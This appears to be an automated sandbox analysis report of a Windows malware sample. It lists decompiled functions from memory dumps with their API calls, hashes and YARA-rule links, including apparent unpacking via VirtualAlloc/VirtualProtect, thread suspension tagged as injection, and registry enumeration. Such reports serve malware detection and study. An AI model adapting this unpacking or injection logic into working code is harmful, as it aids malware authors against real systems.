HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00B054EF), ref: 00B0512C

Strings

Ut, xrefs: 00B05083

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 1c101b4b4bfa7acfe96fc6211f760b376aa78d6441a275c569d578ac11716d3a
Instruction ID: 58aa0b187e541fb8f5f926ff17f8d8a6e2094c2a67f04c051d46304ce233b7ef
Opcode Fuzzy Hash: 1c101b4b4bfa7acfe96fc6211f760b376aa78d6441a275c569d578ac11716d3a
Instruction Fuzzy Hash: 5D319C72900108BFDB21DBD4DD85EAE7FFCEB04700F1505E9B601A71A1DAB1EA05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B0577D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B0577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xb0d380; // 0x18d9b00
				_push(0x800);
				_push(0);
				_push( *0xb0d270);
				if( *0xb0d284 >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xb0d284 =  *0xb0d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00B0789B(_t44, _t40); // executed
						_t18 = E00B03720(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xb0d284 < 5) {
								 *0xb0d284 =  *0xb0d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00B047D5();
						HeapFree( *0xb0d270, 0, _t40);
						goto L10;
					}
					_t24 = E00B044A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00B06109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x00b0577d
0x00b0577d
0x00b05780
0x00b05781
0x00b0578b
0x00b05792
0x00b05797
0x00b05799
0x00b0579f
0x00b057bf
0x00b057c7
0x00b057df
0x00b057e1
0x00b057e2
0x00b057e4
0x00b05822
0x00b05822
0x00b05828
0x00b0582e
0x00b0582e
0x00b057e6
0x00b057ec
0x00b057ef
0x00b057fe
0x00b05800
0x00b05807
0x00b0583b
0x00b05840
0x00b05842
0x00b05844
0x00b05844
0x00000000
0x00b05842
0x00b05809
0x00b0580e
0x00b0581c
0x00000000
0x00b0581c
0x00b057d6
0x00b057db
0x00b057db
0x00000000
0x00b057db
0x00b057a9
0x00000000
0x00000000
0x00b057b8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00B057A1

Part of subcall function 00B06109: GetTickCount.KERNEL32 ref: 00B0611D
Part of subcall function 00B06109: wsprintfA.USER32 ref: 00B0616D
Part of subcall function 00B06109: wsprintfA.USER32 ref: 00B0618A
Part of subcall function 00B06109: wsprintfA.USER32 ref: 00B061B6
Part of subcall function 00B06109: HeapFree.KERNEL32(00000000,?), ref: 00B061C8
Part of subcall function 00B06109: wsprintfA.USER32 ref: 00B061E9
Part of subcall function 00B06109: HeapFree.KERNEL32(00000000,?), ref: 00B061F9
Part of subcall function 00B06109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B06227
Part of subcall function 00B06109: GetTickCount.KERNEL32 ref: 00B06238

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00B057BF
HeapFree.KERNEL32(00000000,00000002,00B0553A,?,00B0553A,00000002,?,?,00B053C9,?), ref: 00B0581C

Strings

Ut, xrefs: 00B0581C

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Ut
API String ID: 1676223858-8415677
Opcode ID: 25412c55ce483469c4a8849ceb72c567a25c966200101fbd6d90cfa45d28230c
Instruction ID: 64062f7678b42602178934f1dcb8f028eb66c54b4ee86f4a294f66af027ac24d
Opcode Fuzzy Hash: 25412c55ce483469c4a8849ceb72c567a25c966200101fbd6d90cfa45d28230c
Instruction Fuzzy Hash: 1F2139B1201209EBDB119F94DC84A9A3BFCEB58740F2040A6F90297691EB70ED05DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A12B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A12B5(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e1a41c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x6e1a12bf
0x6e1a12cc
0x6e1a12d2
0x6e1a12de
0x6e1a12ee
0x6e1a12f0
0x6e1a12f8
0x6e1a138d
0x6e1a1394
0x00000000
0x00000000
0x00000000
0x6e1a12fe
0x6e1a12fe
0x6e1a12fe
0x6e1a1302
0x00000000
0x00000000
0x6e1a130e
0x6e1a1312
0x6e1a1336
0x6e1a133a
0x6e1a134e
0x6e1a134e
0x6e1a1354
0x6e1a1363
0x6e1a1367
0x6e1a136f
0x6e1a136f
0x6e1a1377
0x6e1a137a
0x6e1a1387
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a1387
0x6e1a1342
0x6e1a1346
0x6e1a134c
0x00000000
0x00000000
0x00000000
0x6e1a134c
0x6e1a131a
0x6e1a131e
0x6e1a1328
0x6e1a1320
0x6e1a1320
0x6e1a1320
0x00000000
0x6e1a131e
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E1A12EE
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1A1363
GetLastError.KERNEL32 ref: 6E1A1369

Strings

@Mt MtTt, xrefs: 6E1A1369

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID: @Mt MtTt
API String ID: 1469625949-608512568
Opcode ID: 1bb9d94e9e97d7909c6b116250983e1267910f48784e1c3a58706b06722647bd
Instruction ID: c9c5160d115c234f73530ce437652c240b58a23279c793ea8dd95ada499a3deb
Opcode Fuzzy Hash: 1bb9d94e9e97d7909c6b116250983e1267910f48784e1c3a58706b06722647bd
Instruction Fuzzy Hash: C0217E75A0020AEFCB14CFD9C885ABAF7F4FF08364F014459D602D7408E3B4A6A8DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B5DB7C, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B5DBAA
ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 00B5DC34
WaitForSingleObject.KERNEL32(00000064), ref: 00B5DC42
SuspendThread.KERNELBASE(?), ref: 00B5DC55

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: b4b2a7fc242ff32cbc27281e17710572d3ad35984627c55314eceb4c8648e149
Instruction ID: 2257558d97e7d761b2344cb46ce9c38fb6f8b6f2567de8e9addb71009db4da0e
Opcode Fuzzy Hash: b4b2a7fc242ff32cbc27281e17710572d3ad35984627c55314eceb4c8648e149
Instruction Fuzzy Hash: 3A416D71108301AFE721EF64CC81E6BBBE9FF88310F004A6DFA9592160DB71D958CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B03DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00B03DFD
SysAllocString.OLEAUT32(00B028D9), ref: 00B03E41
SysFreeString.OLEAUT32(00000000), ref: 00B03E55
SysFreeString.OLEAUT32(00000000), ref: 00B03E63

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8c6466019bfbe83dcc38c888de24c0484be4353586338f04705a30b599aa9f31
Instruction ID: 82ca284a4f5d397a90091713598840fd71d513cd04558e23e469328ed85088f3
Opcode Fuzzy Hash: 8c6466019bfbe83dcc38c888de24c0484be4353586338f04705a30b599aa9f31
Instruction Fuzzy Hash: 09310C76900209EFCB05CF98D8C48AE7BF9FF18740B20856EF5069B291D7709A81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00B024BE, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B024BE(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00B075F6(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00B04AAB(_v28);
							goto L17;
						}
						_t42 = E00B0282B(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00B04AAB(_v24);
						_v20 = _v16;
						_t47 = E00B075F6(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xb0d2a4, 0) == 0x102);
				goto L16;
			}

0x00b024be
0x00b024d8
0x00b024db
0x00b024de
0x00b024e1
0x00b024e4
0x00b024ea
0x00b024ee
0x00b025c8
0x00b025cc
0x00b025cc
0x00b024f7
0x00b024fe
0x00b02503
0x00b02508
0x00b025bd
0x00b025c0
0x00000000
0x00b025c6
0x00b0250e
0x00b02511
0x00b02518
0x00b02522
0x00b0252b
0x00b02531
0x00b02539
0x00b02571
0x00b025ab
0x00b025b1
0x00b025b3
0x00b025b3
0x00b025b5
0x00b025b8
0x00000000
0x00b025b8
0x00b02586
0x00b0258b
0x00b0258f
0x00000000
0x00000000
0x00000000
0x00b0258f
0x00b0253e
0x00b0254d
0x00000000
0x00000000
0x00b02552
0x00b0255b
0x00b0255e
0x00b02563
0x00b02568
0x00b02543
0x00b02543
0x00000000
0x00b02543
0x00b0256c
0x00000000
0x00b0256c
0x00b02540
0x00000000
0x00b02591
0x00b0259e
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00B02197,?), ref: 00B024E4

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

RegEnumKeyExA.KERNELBASE(?,?,?,00B02197,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00B02197), ref: 00B0252B
WaitForSingleObject.KERNEL32(00000000,?,?,?,00B02197,?,00B02197,?,?,?,?,?,00B02197,?), ref: 00B02598
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00B02197,?,?,?,?,00B0555B,?,00000001), ref: 00B025C0

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: 7ea3f3c7b0deeddfae10267b1a0d3e9ca092323a221f8418af9a94f4bf9f27c3
Instruction ID: d3aaa09c8fd83f096e9a7072adca8b34c97ede37438bf23621872609ebdca8df
Opcode Fuzzy Hash: 7ea3f3c7b0deeddfae10267b1a0d3e9ca092323a221f8418af9a94f4bf9f27c3
Instruction Fuzzy Hash: B9315C75D00119AFCF22ABA5CC999EEFFB9EB68310F1040A6E915B31A0E7704E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1A189E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6e1a41b0;
				_t46 = E6E1A2016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6e1a41c0;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6e1a51a7; // 0x6e1a51a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6E1A1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6e1a41c0 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x6e1a18a5
0x6e1a18b5
0x6e1a18ba
0x6e1a18bf
0x6e1a18d4
0x6e1a18db
0x6e1a18e0
0x6e1a18f1
0x6e1a18f4
0x6e1a18fa
0x6e1a18ff
0x6e1a19b2
0x6e1a1905
0x6e1a1905
0x6e1a190b
0x6e1a197a
0x6e1a190d
0x6e1a190d
0x6e1a1910
0x6e1a1912
0x6e1a191a
0x6e1a191d
0x6e1a1920
0x6e1a1928
0x6e1a1933
0x6e1a1934
0x6e1a1935
0x6e1a1952
0x6e1a1960
0x6e1a1967
0x6e1a196a
0x6e1a196d
0x6e1a1975
0x00000000
0x00000000
0x6e1a1925
0x6e1a1925
0x6e1a1977
0x6e1a1984
0x6e1a1999
0x6e1a1986
0x6e1a198f
0x6e1a1994
0x6e1a19aa
0x6e1a19aa
0x6e1a19b9
0x6e1a19bf

APIs

VirtualAlloc.KERNELBASE(00000000,74E063F0,00003000,00000004,00000030,00000000,74E063F0,00000000,?,?,?,?,?,?,6E1A163B,00000000), ref: 6E1A18F4
memcpy.NTDLL(?,6E1A163B,74E063F0,?,?,?,?,?,?,6E1A163B,00000000,00000030,74E063F0,00000000), ref: 6E1A198F
VirtualFree.KERNELBASE(6E1A163B,00000000,00008000,?,?,?,?,?,?,6E1A163B,00000000), ref: 6E1A19AA

Strings

Sep 18 2021, xrefs: 6E1A192B

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 18 2021
API String ID: 4010158826-1373364653
Opcode ID: 15201bc504400058d3614fc60059c3f93505da591955efef4fbcfc5734217d16
Instruction ID: 4a0e4f8d776505ab24c44eaa18f76f0510c38d79725c74496b2b5178a22daf8d
Opcode Fuzzy Hash: 15201bc504400058d3614fc60059c3f93505da591955efef4fbcfc5734217d16
Instruction Fuzzy Hash: 60311DB5A002199FDB01CFD8C980BFEBBB9FB15304F104159EA05BB241D771AA46DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B02107, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00B02107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00B03946(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00B065EA(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00B037AC(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xb0d2e4, 1, 0,  *0xb0d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00B024BE(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00B0282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00B051BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00B07CC7( &_v32, _t39);
					goto L13;
				}
			}

0x00b02107
0x00b02114
0x00b0211a
0x00b0211b
0x00b0211c
0x00b0211d
0x00b0211e
0x00b02122
0x00b02129
0x00b0212e
0x00b02132
0x00b021ba
0x00b021ba
0x00b021bd
0x00b021bf
0x00b021c7
0x00b021c7
0x00b021cd
0x00b021d0
0x00b021d0
0x00b021cd
0x00b021db
0x00b021db
0x00b0213e
0x00b02145
0x00b02147
0x00b02147
0x00b0215e
0x00b02162
0x00b02165
0x00b02170
0x00b02177
0x00b02177
0x00b02180
0x00b02184
0x00b02192
0x00b02186
0x00b02186
0x00b02187
0x00b02188
0x00b02189
0x00b0218a
0x00b0218b
0x00b0218b
0x00b02197
0x00b0219a
0x00b0219e
0x00b021a0
0x00b021a0
0x00b021a7
0x00000000
0x00b021a9
0x00b021a9
0x00b021b6
0x00000000
0x00b021b6

APIs

CreateEventA.KERNEL32(00B0D2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,00B0555B,?,00000001,?), ref: 00B02158
SetEvent.KERNEL32(00000000,?,?,?,00B0555B,?,00000001,?,00000002,?,?,00B053C9,?), ref: 00B02165
Sleep.KERNELBASE(00000BB8,?,?,?,00B0555B,?,00000001,?,00000002,?,?,00B053C9,?), ref: 00B02170
CloseHandle.KERNEL32(00000000,?,?,?,00B0555B,?,00000001,?,00000002,?,?,00B053C9,?), ref: 00B02177

Part of subcall function 00B024BE: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00B02197,?), ref: 00B024E4
Part of subcall function 00B024BE: RegEnumKeyExA.KERNELBASE(?,?,?,00B02197,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00B02197), ref: 00B0252B
Part of subcall function 00B024BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,00B02197,?,00B02197,?,?,?,?,?,00B02197,?), ref: 00B02598
Part of subcall function 00B024BE: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00B02197,?,?,?,?,00B0555B,?,00000001), ref: 00B025C0

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 998d98416622bd42d3c4b296307bb1414da4c58333ab3ca60e92c80e8a2cbccd
Instruction ID: 0acff5a65e436ac7d42612f8efcbdb12dcdfb60ab5fcbf4092e6dd8c636d3466
Opcode Fuzzy Hash: 998d98416622bd42d3c4b296307bb1414da4c58333ab3ca60e92c80e8a2cbccd
Instruction Fuzzy Hash: 9A216576D00219ABDB21AFE4C88999E7FF9EF44750B0185A5FB11B71C0DB349D49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B063F5, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B063F5(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00B075F6(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00B04AAB(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00B0944A(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x00b06401
0x00b06424
0x00b0642e
0x00b06434
0x00b06438
0x00b06450
0x00b06455
0x00b0649d
0x00b06457
0x00b0645f
0x00b06463
0x00b0649a
0x00b06465
0x00b06477
0x00b0647b
0x00b06491
0x00b0647d
0x00b06480
0x00b06482
0x00b06487
0x00b0648c
0x00b0648c
0x00b06487
0x00b0647b
0x00b06463
0x00b064a5
0x00b064a5
0x00b064ac
0x00b064b2
0x00b064b2
0x00b0641a
0x00b0641e
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,018D9BDE,018D9BDE), ref: 00B0642E
RegQueryValueExW.KERNELBASE(018D9BDE,?,00000000,80000002,00000000,00000000,?,00B0290A,3D00B0C0,80000002,00B02197,00000000,00B02197,?,018D9BDE,80000002), ref: 00B06450
RegQueryValueExW.ADVAPI32(018D9BDE,?,00000000,80000002,00000000,00000000,00000000,?,00B0290A,3D00B0C0,80000002,00B02197,00000000,00B02197,?,018D9BDE), ref: 00B06475
RegCloseKey.ADVAPI32(018D9BDE,?,00B0290A,3D00B0C0,80000002,00B02197,00000000,00B02197,?,018D9BDE,80000002,00000000,?), ref: 00B064A5

Part of subcall function 00B0944A: SafeArrayDestroy.OLEAUT32(00000000), ref: 00B094D2

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 0ceb0cb4ad40b851358604fe5d384cedcdad926e335c523280e4a588a471f0ca
Instruction ID: cebef9b70e68efe721b31d490a8d8c0fdb633b9976438d889eb671347bcb0cbf
Opcode Fuzzy Hash: 0ceb0cb4ad40b851358604fe5d384cedcdad926e335c523280e4a588a471f0ca
Instruction Fuzzy Hash: A921097250011ABFCF119F95DC80CEE7FE9FB083A0B0484A6FE15972A0D6319D61ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B681D2, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(00B5B0CC,?,00000000,00B5B0CC,00000000,00B5B0DC,00B5B0CC,?,?,?,?,00B709A6,80000001,?,00B5B0CC,00B5B0DC), ref: 00B681F7
RtlAllocateHeap.NTDLL(00000000,00B5B0DC,00000000), ref: 00B6820E
